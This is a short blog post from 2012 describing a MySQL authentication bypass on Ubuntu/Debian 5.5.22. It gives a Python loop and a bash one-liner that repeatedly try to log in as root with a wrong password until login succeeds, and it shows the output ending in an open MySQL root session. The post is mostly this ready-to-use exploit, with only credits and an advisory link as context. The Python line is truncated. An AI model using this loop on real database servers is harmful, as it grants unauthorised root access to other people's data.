Jun 11, 2012

MySQL Authen Bypass Vulnerability On Ubuntu (*update python script)

 This vulnerability was public by @hdmoore, @jcran, @jduck1337 and another security expert guys from my twitter.

This vulnerability effects on Ubuntu/Debian 32/64bit, MySQL 5.5.22 not work on RHEL/CentOS5 and 6 (x86_64)

Python script for this vulnerability

import subprocess

while 1:
        subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait(

Details here: http://seclists.org/oss-sec/2012/q2/493

hdm@grunt:~$ while true; do mysql -u root mysql --password=baha; done
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
< snip >
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1248
Server version: 5.5.22-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.


Source: http://pastie.org/private/903voijkkz8nmde3yqj4rw

If you like my blog, Please Donate Me

No comments: